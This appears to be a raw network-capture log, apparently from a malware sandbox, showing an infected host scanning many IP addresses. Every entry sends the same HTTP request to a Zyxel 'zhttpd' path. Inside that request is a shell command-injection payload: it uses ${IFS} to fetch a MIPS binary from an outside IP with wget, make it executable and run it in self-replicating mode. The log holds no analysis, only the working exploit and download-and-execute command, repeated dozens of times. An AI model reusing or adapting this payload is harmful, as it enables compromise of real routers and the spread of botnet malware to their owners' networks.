                                                        Jan 28, 2024 10:12:48.333395004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3411192.168.2.14437805.251.235.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333455086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3412192.168.2.145716250.229.55.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333477020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3413192.168.2.144588275.223.209.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333508968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3414192.168.2.143619876.237.242.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333544016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3415192.168.2.145905025.202.221.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333592892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3416192.168.2.144174052.72.115.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333643913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3417192.168.2.1444550142.29.133.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333683968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3418192.168.2.14329884.88.229.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333730936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3419192.168.2.1448020124.52.105.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337388039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3420192.168.2.143364661.165.235.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337429047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3421192.168.2.145616481.158.205.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337466002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3422192.168.2.14573448.28.239.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337502003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3423192.168.2.14606624.221.197.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337553978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3424192.168.2.144712241.242.63.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337605000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3425192.168.2.143282080.250.177.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337637901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3426192.168.2.145444859.46.241.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337662935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3427192.168.2.14384589.40.158.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337691069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3428192.168.2.144865482.254.179.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337753057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3429192.168.2.1443906140.100.137.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337781906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3430192.168.2.144832883.240.182.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337807894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3431192.168.2.145118493.13.246.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.337871075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3432192.168.2.1448268178.0.21.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332165003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3433192.168.2.1437094123.216.81.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332205057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3434192.168.2.1459448166.118.37.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332232952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3435192.168.2.1451580138.136.52.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332274914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3436192.168.2.144766652.74.187.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332329988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3437192.168.2.146071859.213.95.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332345009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3438192.168.2.144703880.98.167.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332365036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3439192.168.2.144831051.127.232.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332429886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3440192.168.2.1449736138.227.202.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332468987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3441192.168.2.144487649.46.202.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332499981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3442192.168.2.1459280117.170.190.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332545042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3443192.168.2.1444770132.125.86.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332585096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3444192.168.2.1452024151.142.15.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332638025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3445192.168.2.1452184135.181.62.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332683086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3446192.168.2.1434894143.56.196.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332709074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3447192.168.2.143743212.188.126.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332763910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3448192.168.2.143681499.26.97.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332792044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3449192.168.2.144233869.137.130.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332817078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3450192.168.2.1436884104.32.244.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332875967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3451192.168.2.1457858108.18.142.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332912922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3452192.168.2.144644847.211.7.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332947016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3453192.168.2.1443578167.73.161.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.332997084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3454192.168.2.145528093.251.34.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333031893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3455192.168.2.14465728.30.152.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333072901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3456192.168.2.1432936110.51.146.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333100080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3457192.168.2.1435566169.64.75.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333132982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3458192.168.2.1434442177.85.240.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333183050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3459192.168.2.1443638180.229.141.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333225965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3460192.168.2.1437696186.198.230.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333255053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3461192.168.2.1440976180.213.240.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333296061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3462192.168.2.1442870176.63.159.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333345890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3463192.168.2.1441954162.251.110.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333369017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3464192.168.2.144508489.156.166.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333406925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3465192.168.2.143948642.248.238.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333437920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3466192.168.2.1442648217.211.9.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333468914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3467192.168.2.1436344117.157.220.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333503008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3468192.168.2.1448148206.118.106.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333529949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3469192.168.2.1460394207.71.250.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333556890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3470192.168.2.1441482185.42.246.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333595991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3471192.168.2.143492241.168.201.188443
                                                        TimestampBytes transferredDirectionData
